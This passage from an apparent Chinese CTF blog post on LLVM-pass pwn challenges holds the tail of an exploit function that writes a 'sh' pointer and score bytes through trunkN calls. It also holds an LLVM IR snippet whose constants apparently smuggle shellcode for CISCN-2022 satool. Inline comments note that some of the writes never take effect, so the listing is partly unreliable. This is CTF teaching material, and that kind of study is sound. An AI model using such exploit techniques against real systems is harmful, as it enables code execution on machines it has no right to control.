trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
// cmd bytes for 0x6EFDAD ("sh" pointer). NOTE(review): trunk232..235 are
// called only once in this listing, so by the two-call rule these values are
// never written; this looks like a leftover from the first exploit.
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
// score bytes (0x40 placed via trunk242; the resulting value is not explained on the page)
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
// second round: repeating the score names triggers the writes of the values recorded above
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
// upgrade: adds 0xFF to every weapon's damage (per the description above)
upgrade(0xFF);
// fight: runs the score comparison described above
fight(0);
}
CISCN-2022 satool
暂时先不写了。连续学了一个星期有点累,先去做点常规的pwn,过段时间再来把这道题写一下,也许到那时候思路会更清晰。先放一篇比较详细的文章:llvmPWN_ciscn2022_satool | Fang's Blog! (gitee.io)
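; IR excerpt for CISCN-2022 satool (not analysed in this post, see the linked
; write-up): a chain of nsw adds of constants onto %0. The hex values that were
; pasted inline after two of the constants in the original listing are moved
; into comments so the function parses as IR.
define dso_local i64 @pwn(i64 %0) local_unnamed_addr #0 {
  %2 = add nsw i64 %0, 21732277098          ; 0x50F583B6A
  %3 = add nsw i64 %2, 426533919260756112   ; 0x5EB5A56F6314890
  %4 = add nsw i64 %3, 426712264860536976
  %5 = add nsw i64 %4, 426555988614513992
  %6 = add nsw i64 %5, 426470739404150928
  %7 = add nsw i64 %6, 426435038325729424
  %8 = add nsw i64 %7, 20000000000000
  ret i64 %8
}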
标签:llvm,return,int,void,add,PassManager,pass,pwn
From: https://www.cnblogs.com/trunk/p/17565160.html